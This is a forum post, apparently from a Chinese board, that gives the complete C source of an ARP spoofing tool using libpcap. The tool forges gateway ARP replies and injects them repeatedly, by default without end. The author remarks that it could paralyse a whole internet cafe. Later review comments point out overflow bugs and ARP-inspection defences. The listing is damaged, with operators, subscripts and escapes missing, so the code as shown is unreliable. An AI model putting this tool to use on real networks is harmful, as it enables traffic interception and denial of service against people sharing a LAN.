科普部分:
如果大家不清楚下面的概念的话,请Baidu或Google之~
1. 网络的分层
2. 链路层
3. 局域网中的arp的作用
好,下面开始贴程序……希望大家把程序用在正道上……因为稍微修改一下就可能让一个网吧的所有电脑瘫痪……
程序一共有5个文件,还要用到一个pcap库(因为要直接跟网卡打交道,所以……这个库既有linux版也有windows版),大家如果要编译的话要记得链接它:
linux用户:
在gcc选项里记得-lpcap
windows用户,下载好pcap库之后,在VC里面静态链接的选项里面加上该库(原帖此处文字缺失)。
//////////////////////////////////////////////////////////////
//main.c
/////////////////////////////////////////////////////////////
#include "arpatt.h"
/*
 * Entry point: decides where the run parameters come from, then calls
 * attPrepare(), showGlobal() and attack() in that order.
 *
 *   argc == 2       "-d" loads saved settings with loadIniFile(NULL) and, if
 *                   that fails, rebuilds them with buildIniFile(NULL);
 *                   "-s" only rebuilds the settings file and returns 0;
 *                   anything else is rejected with -1.
 *   odd argc 3..13  option/value pairs are copied into the global settings,
 *                   then devini() prompts for the capture device.
 *   otherwise       prints the usage text and returns 0.
 *
 * Returns 0 on success and -1 on failure.
 *
 * NOTE(review): this listing was damaged when the page was extracted. The
 * loop condition, the argv subscripts and the backslashes of the "\n"/"\t"
 * escapes appear to have lost characters, so the text does not compile as
 * shown. It is kept verbatim here rather than reconstructed.
 */
int main(int argc,char *argv[]){
int i;
switch(argc){
case 2:
if(strcmp(argv[1],"-d")==0){
/* Fall back to the interactive setup when no usable settings file exists. */
if(loadIniFile(NULL)){
if(buildIniFile(NULL)) return -1;
}
break;
}
if(strcmp(argv[1],"-s")==0){
if(buildIniFile(NULL)) return -1;
return 0;
}
printf("Illegal argument, run %s to see help info.n",argv[0]);
return -1;
/* Odd argument counts mean the program name plus 1..6 option/value pairs. */
case 3:
case 5:
case 7:
case 9:
case 11:
case 13:
for(i=1;iargc;i+=2){
/*
 * NOTE(review): every strcpy() below writes into a 50-byte global declared
 * in arpatt.h with no length check, so an over-long command-line value
 * overflows the destination. A bounded copy (snprintf with sizeof) plus an
 * explicit "too long" error is the safe form.
 */
if(strcmp(argv,"-gip")==0) strcpy(toip,argv[i+1]);
if(strcmp(argv,"-gmac")==0) strcpy(tomac,argv[i+1]);
if(strcmp(argv,"-aip")==0) strcpy(fromip,argv[i+1]);
if(strcmp(argv,"-amac")==0) strcpy(frommac,argv[i+1]);
/*
 * NOTE(review): the sscanf() results are ignored, so a non-numeric value
 * silently leaves the previous setting in place. Delay is declared
 * unsigned int in arpatt.h, so "%d" does not match its type ("%u" would).
 */
if(strcmp(argv,"-f")==0) sscanf(argv[i+1],"%d",&Delay);
if(strcmp(argv,"-t")==0) sscanf(argv[i+1],"%d",&TimeLen);
}
printf("DEVICE:");
/* NOTE(review): devini()'s return value is not checked on this path. */
devini();
break;
default:
printf("[Powered by Ureys]%s Usage:n",argv[0]);
printf("%s -dn",argv[0]);
printf("%s [-gip GatewayIP] [-gmac GatewayMAC] [-aip AttackIP]n"
"[-amac FakeMAC] [-f Frequency] [-t time]n",argv[0]);
printf("%s -sn",argv[0]);
printf("Arguments:n"
"t-d:Use default settings.n"
"t-s:Set default file(%s won't run).n"
"t-f:Frequency:integer(second), delay between 2 packets.n"
"t-t:time:integer(second), attack will last [time] seconds.n",argv[0]);
return 0;
}
if(attPrepare()) return -1;
showGlobal();
if(attack()) return -1;
return 0;
}
//////////////////////////////////////////////////////////
//自己的头文件:arpatt.h
//////////////////////////////////////////////////////////
#ifndef ARPATT_H_
#define ARPATT_H_
#include stdio.h
#include pcap.h
#include string.h
#include stdlib.h
#include unistd.h
//===========================
/* Size in bytes of the devname buffer, terminator included. */
#define MAXDEVNAMELEN 100
//===========================
//===========================
//inifunc.c
/*
 * Settings helpers. The int-returning ones report 0 on success and non-zero
 * on failure, as their callers in main.c and inifunc.c test them.
 * NOTE(review): an empty parameter list in C leaves the parameters
 * unspecified; "(void)" would make these real prototypes.
 */
int devini();
int defaultInit();
int buildIniFile(const char *filename);
int loadIniFile(const char *filename);
void showGlobal();
//===========================
//===========================
//attfunc.c
int attPrepare();
int attack();
/* Returns a bit mask with one bit set per address string that failed to parse. */
unsigned int
makeArpPack(const char *fromip,const char *frommac,const char *toip,const char* tomac);
int getDevHandle();
//===========================
/*
 * Shared state, defined in globalvar.c.
 * NOTE(review): the four address buffers are fixed at 50 bytes and are filled
 * elsewhere in this listing by strcpy(), scanf("%s") and fscanf("%s") without
 * length limits; every such writer needs a bound that matches these sizes.
 */
extern char devname[MAXDEVNAMELEN];
extern pcap_t* devhandle;
extern char errbuf[PCAP_ERRBUF_SIZE];
extern char fromip[50];
extern char frommac[50];
extern char toip[50];
extern char tomac[50];
extern int TimeLen;
extern unsigned int Delay;
extern unsigned char arpReplyPack[];
#endif /*ARPATT_H_*/
///////////////////////////////////////////////////
//inifunc.c
//恩,逻辑结构有点不好,以后有空再改进吧~
///////////////////////////////////////////////////
#include "arpatt.h"
/*
 * Lists the capture devices reported by pcap_findalldevs(), asks the user to
 * pick one by typing a single digit, and copies the chosen name into the
 * global devname.
 *
 * Returns 0 on success and -1 on a lookup or input error; calls exit(1) when
 * the device list is empty.
 *
 * NOTE(review): this listing was damaged when the page was extracted. The
 * comparison operators, the "->" member accesses and the "\n" escapes appear
 * to have lost characters. The code is kept verbatim.
 */
int devini(){
pcap_if_t *alldevsp,*p=NULL;
int i;
int c;
if(pcap_findalldevs(&alldevsp,errbuf)0){
fprintf(stderr,"find dev error=%sn",errbuf);
return -1;
}
p=alldevsp;
if(!p){
fprintf(stderr,"err:no dev/you haven't run it as rootn");
/* NOTE(review): exits here while every other failure path returns -1. */
exit(1);
}
for(i=0;p;p=p-next){
printf("dev%d=%sn",i++,p-name);
/* NOTE(review): libpcap may leave description NULL; confirm before passing it to %s. */
printf("description=%sn",p-description);
}
printf("choose a device:");
/* NOTE(review): fflush() on an input stream is undefined behaviour in standard C. */
fflush(stdin);
/* One character is read, so only single-digit device indexes can be chosen. */
c=getchar();c-='0';
if(c0||c=i){
fprintf(stderr,"err:input error!n");
/* NOTE(review): this return skips pcap_freealldevs(), leaking the device list. */
return -1;
}
/* NOTE(review): as shown, i is never advanced in this loop; verify against the original post. */
for(i=0,p=alldevsp;ic;p=p-next);
strncpy(devname,p-name,MAXDEVNAMELEN-1);
/* NOTE(review): presumably the '\0' terminator before extraction; as shown it stores a space. */
devname[MAXDEVNAMELEN-1]=' ';
pcap_freealldevs(alldevsp);
return 0;
}
/*
 * Prompts on stdout for the four address strings, the run length and the
 * delay, and stores the answers in the corresponding globals.
 *
 * Always returns 0; none of the scanf() results are checked.
 *
 * NOTE(review): each "%s" conversion writes into a 50-byte global (see
 * arpatt.h) without a field width, so a long line of input overflows the
 * buffer. A width such as "%49s" bounds the write. "%d" is also used for
 * Delay, which is declared unsigned int.
 */
int defaultInit(){
printf("From ip(eg:192.168.1.5):");
scanf("%s",fromip);
printf("From mac(eg:AA:BB:CC:DD:EE:FF):");
scanf("%s",frommac);
printf("To ip(eg:192.168.1.1):");
scanf("%s",toip);
printf("To mac(eg:00:BB:CC:AA:EE:AA):");
scanf("%s",tomac);
printf("Attack time length:");
scanf("%d",&TimeLen);
printf("Delay between two attacks:");
scanf("%d",&Delay);
return 0;
}
/*
 * Runs the interactive setup (devini() then defaultInit()) and writes the
 * seven resulting settings to a text file.
 *
 * filename: path to write, or NULL to use "default.ini" in the current
 *           directory.
 *
 * Returns 0 on success and -1 when defaultInit() fails or the file cannot be
 * opened; calls exit(1) when devini() fails.
 *
 * NOTE(review): the format string appears to have lost the backslashes of
 * its "\n" separators during extraction. The results of fprintf() and
 * fclose() are not checked, so a short write goes unnoticed.
 */
int buildIniFile(const char *filename){
FILE *fp;
if(devini()) exit(1);
if(defaultInit()) return -1;
if(filename)
fp=fopen(filename,"w");
else
fp=fopen("default.ini","w");
if(!fp){
fprintf(stderr,"err:Cannot create file!n");
return -1;
}
fprintf(fp,"%sn%sn%sn%sn%sn%dn%dn",devname,fromip,frommac,toip,tomac,TimeLen,Delay);
fclose(fp);
return 0;
}
/*
 * Reads the seven settings written by buildIniFile() back into the globals.
 *
 * filename: path to read, or NULL to use "default.ini" in the current
 *           directory.
 *
 * Returns 0 when all seven fields were converted, -1 when the file cannot be
 * opened or fewer than seven fields were read.
 *
 * NOTE(review): the file is untrusted input. The "%s" conversions carry no
 * field width, so an over-long line in the settings file overflows devname
 * (MAXDEVNAMELEN bytes) or one of the 50-byte address buffers; widths that
 * match the buffer sizes are needed. fp is never closed on any path in this
 * function. The format string appears to have lost the backslashes of its
 * "\n" separators during extraction.
 */
int loadIniFile(const char *filename){
FILE *fp;
int status;
if(filename)
fp=fopen(filename,"r");
else
fp=fopen("default.ini","r");
if(!fp){
fprintf(stderr,"err:Cannot load file!n");
return -1;
}
status=fscanf(fp,"%sn%sn%sn%sn%sn%dn%dn",devname,fromip,frommac,toip,tomac,&TimeLen,&Delay);
/* fscanf() returns the number of converted fields; all seven are required. */
if(status!=7){
fprintf(stderr,"err:bad file format!n");
return -1;
}
return 0;
}
/*
 * Prints the current values of the global settings to stdout.
 *
 * NOTE(review): Delay is declared unsigned int but printed with "%d". The
 * "\n" escapes appear to have lost their backslashes during extraction.
 */
void showGlobal(){
printf("======Current Status======n");
printf("device name=%sn",devname);
printf("From IP=%sn",fromip);
printf("From MAC=%sn",frommac);
printf("To IP=%sn",toip);
printf("To MAC=%sn",tomac);
printf("Attack time length(-1 for non-stop)=%dn",TimeLen);
printf("Delay between two attacks=%dn",Delay);
printf("==========================n");
}
//////////////////////////////////////////////////////////////////////////
//全局变量globalvar.c
//////////////////////////////////////////////////////////////////////////
#include "arpatt.h"
/* Definitions of the shared state declared extern in arpatt.h. */
/* Error text buffer handed to the libpcap calls. */
char errbuf[PCAP_ERRBUF_SIZE]={0};
/* Capture handle; assigned by getDevHandle(). */
pcap_t* devhandle=NULL;
/* Name of the selected capture device. */
char devname[MAXDEVNAMELEN]={0};
/* Built-in defaults for the textual addresses (50-byte buffers). */
char fromip[50]="192.168.1.8";
char frommac[50]="AA:BB:CC:DD:EE:FF";
char toip[50]="192.168.1.1";
char tomac[50]="00:00:50:10:22:0c";
/* Run length; showGlobal() labels -1 as "non-stop". */
int TimeLen=-1;
/* Pause between two sends; the usage text in main.c gives the unit as seconds. */
unsigned int Delay=1;
/*
 * 42-byte frame template: a 14-byte Ethernet header followed by a 28-byte
 * ARP payload with opcode 2 (reply). The field labels on each row are the
 * author's.
 *
 * Defender's view: frames built from this template are unsolicited ARP
 * replies. Switch-side ARP inspection, static ARP entries for the gateway
 * and ARP-monitoring tools are the usual controls against them.
 */
unsigned char arpReplyPack[]=
{
0x00,0x00,0x50,0x10,0x22,0x0c, //Gateway MAC
0x00,0x14,0x85,0x07,0xff,0x2e, //someone's MAC
0x08,0x06, //ARP(DO NOT CHANGE)
0x00,0x01, //Hardware type:Ethernet(DO NOT CHANGE)
0x08,0x00, //Protocol type:IP(DO NOT CHANGE)
0x06, //Hardware size(DO NOT CHANGE)
0x04, //Protocol size(DO NOT CHANGE)
0x00,0x02, //Opcode:reply(DO NOT CHANGE)
0x00,0x14,0x85,0x07,0xff,0x2e, //someone's MAC
0xc0,0xa8,0x01,0x08, //someone's IP
0x00,0x00,0x50,0x10,0x22,0x0c, //Gateway MAC
0xc0,0xa8,0x01,0x01 //Gateway IP
};
//////////////////////////////////////////////////////////////////////////
//关键的几个函数attfunc.c
//////////////////////////////////////////////////////////////////////////
#include "arpatt.h"
/*
 * Opens the device named in devname with pcap_open_live() and stores the
 * handle in the global devhandle. The call passes BUFSIZ as the snapshot
 * length, 1 for promiscuous mode and 0 for the read timeout.
 *
 * Returns 0 on success, -1 when no handle was obtained.
 *
 * NOTE(review): errbuf holds libpcap's reason for the failure but is not
 * printed. No matching pcap_close() is visible anywhere in this listing.
 */
int getDevHandle(){
devhandle=pcap_open_live(devname, BUFSIZ, 1, 0, errbuf);
if(!devhandle){
fprintf(stderr,"err:wrong handle get!n");
return -1;
}
return 0;
}
/*
 * Parses the four textual addresses and writes their bytes into the global
 * arpReplyPack template.
 *
 * Returns a bit mask of the inputs that failed to parse (0 means all four
 * were accepted):
 *   0x0001  fromip    0x0010  frommac
 *   0x0100  toip      0x1000  tomac
 *
 * NOTE(review): this listing was damaged when the page was extracted. The
 * loop conditions and several array subscripts appear to have lost
 * characters. The code is kept verbatim and the missing subscripts are not
 * reconstructed.
 *
 * NOTE(review): parsed values are cast to unsigned char without a range
 * check, so an out-of-range octet is silently truncated. "%x" expects
 * unsigned int * but is given int *.
 */
unsigned int
makeArpPack(const char *fromip,const char *frommac,const char *toip,const char* tomac){
int a[6];
int i;
unsigned int status=0;
if(4==sscanf(fromip,"%d.%d.%d.%d",a,a+1,a+2,a+3)){
for(i=28;i=31;++i)
arpReplyPack=(unsigned char)a[i-28];
}
else
status|=0x0001;
if(6==sscanf(frommac,"%x:%x:%x:%x:%x:%x",a,a+1,a+2,a+3,a+4,a+5)){
for(i=0;i=5;++i)
arpReplyPack[i+6]=arpReplyPack[i+22]=(unsigned char)a;
}
else
status|=0x0010;
if(4==sscanf(toip,"%d.%d.%d.%d",a,a+1,a+2,a+3)){
for(i=0;i=3;++i)
arpReplyPack[i+38]=(unsigned char)a;
}
else
status|=0x0100;
if(6==sscanf(tomac,"%x:%x:%x:%x:%x:%x",a,a+1,a+2,a+3,a+4,a+5)){
for(i=0;i=5;++i)
arpReplyPack=arpReplyPack[i+32]=(unsigned char)a;
}
else
status|=0x1000;
return status;
}
/*
 * Opens the capture handle and fills the frame template from the global
 * address strings.
 *
 * Returns 0 on success, -1 when getDevHandle() fails.
 *
 * NOTE(review): the status mask returned by makeArpPack() is discarded, so a
 * malformed address is not reported and the affected template bytes keep
 * their previous values.
 */
int attPrepare(){
if(getDevHandle()) return -1;
makeArpPack(fromip,frommac,toip,tomac);
return 0;
}
/*
 * Send loop: writes the first 42 bytes of arpReplyPack to devhandle with
 * pcap_inject(), prints a dot to stderr, sleeps Delay seconds and repeats.
 * When TimeLen is -1 the loop never counts iterations and so never ends on
 * its own; otherwise count is compared with TimeLen to decide when to stop.
 *
 * Returns 0 when the loop ends, -1 when pcap_inject() reports an error.
 *
 * NOTE(review): the comparison between count and TimeLen and the "\n"
 * escape appear to have lost characters during extraction. The code is kept
 * verbatim. The error message omits libpcap's error text, and packsize
 * repeats the template length as a literal instead of deriving it from the
 * array.
 *
 * Defender's view: the result on the wire is the same unsolicited ARP reply
 * repeated at a fixed interval. ARP-monitoring tools and switch-side ARP
 * inspection are built to flag that pattern.
 */
int attack(){
int count=0;
int packsize=42;
printf("ATTACK!!!n");
while(1){
if(pcap_inject(devhandle,arpReplyPack,packsize)==-1){
printf("error in sending packet");
return -1;
}
fprintf(stderr,".");
sleep(Delay);
if(TimeLen==-1) continue;
count++;
if(countTimeLen) break;
}
return 0;
}
终于贴完了阿~~~~~~~~~~~~~~~~~~~~~
总而言之这个程序的风格还是比较不好的,大家不要学,全局变量大量使用是个人的一点不好的小习惯。这个例子完全就是arp攻击的范例了,总而言之和P2P终结者有点像但又不太一样……能够控制链路层的东西,就给人一种能够操纵感,你可以利用它伪造你的IP,也可以做个爆吧机什么的(汗,怎么我没想到一个好的用途呢……)
楼主 2016-01-23 11:24 回复